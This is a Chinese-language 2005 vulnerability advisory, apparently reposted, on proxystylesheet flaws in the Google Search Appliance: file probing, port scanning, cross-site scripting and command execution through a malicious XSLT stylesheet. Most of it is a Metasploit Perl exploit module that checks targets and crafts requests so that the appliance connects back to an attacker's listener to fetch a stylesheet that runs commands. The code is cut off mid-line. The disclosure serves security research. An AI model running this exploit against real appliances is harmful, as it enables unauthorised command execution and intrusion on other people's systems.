发布日期:2005-11-21
更新日期:2005-11-21
受影响系统:
Google Search Appliance
Google Mini Search Appliance
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 15509
Google搜索工具是一款大型的企业级硬件搜索工具。Google搜索工具的搜索界面使用proxystylesheet表单变量判断应对搜索结果应用何种样式表。这个变量可以是本地文件名或HTTP URL。
Google搜索工具在处理proxystylesheet变量时存在多个安全漏洞,远程攻击者可能利用这些漏洞非授权获取系统信息或执行任意Javascript代码。
攻击者可以向proxystylesheet变量提供一段恶意的Javascript代码,这样工具就会根据该名称查找本地文件,并显示包含有Javascript代码的错误消息。
攻击者可以通过使用样式表目录的相对路径来判断系统中是否存在任意文件,从服务器返回的错误消息会泄漏是否提供了有效的路径。这个漏洞可用于判断底层操作系统和kernel版本。
由于从服务器返回的开放端口和关闭端口错误消息不同,攻击者可以通过请求执行目标系统及该系统上个别端口的HTTP URL来执行基本的端口扫描。
攻击者可以通过创建恶意的XSLT样式表并在proxystylesheet参数中指定到这个样式表的URL来执行跨站脚本攻击。搜索工具会下载样式表并向执行搜索的用户提交恶意的Javascript。
攻击者可以通过创建恶意的XSLT样式表在搜索工具上执行任意Java类方法,导致可以以非特权用户权限执行系统命令。如果结合有漏洞的kernel版本,就可能导致远程root shell。
<*来源:H D Moore (hdm@metasploit.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113260745222998&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::google_proxystylesheet_exec;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
my $advanced = { };
my $info =
{
'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be able to connect back to your machine for this exploit to work.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],
'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
},
'Payload' =>
{
'Space' => 1024,
'Keys' => [ 'cmd' ],
},
'Refs' =>
[
['OSVDB', 20981],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Google Search Appliance']
],
'Keys' => [ 'google' ],
'DisclosureDate' => 'Aug 16 2005',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Check {
my $self = shift;
my $s = $self->ConnectSearch;
if (! $s) {
return $self->CheckCode('Connect');
}
my $url =
"/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
"site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"output=xml_no_dtd&".
"q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
$s->Send("GET $url HTTP/1.0\r\n\r\n");
my $page = $s->Recv(-1, 5);
$s->Close;
if ($page =~ /cannot be resolved to an ip address/) {
$self->PrintLine("[*] This system appears to be vulnerable >:-)");
return $self->CheckCode('Confirmed');
}
if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
$self->PrintLine("[*] This system appears to be patched");
}
$self->PrintLine("[*] This system does not appear to be vulnerable");
return $self->CheckCode('Safe');
}
sub Exploit
{
my $self = shift;
my ($s, $page);
# Request the index page to obtain a redirect response
$s = $self->ConnectSearch || return;
$s->Send("GET / HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 5);
$s->Close;
# Parse the redirect to get the client and site values
my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&
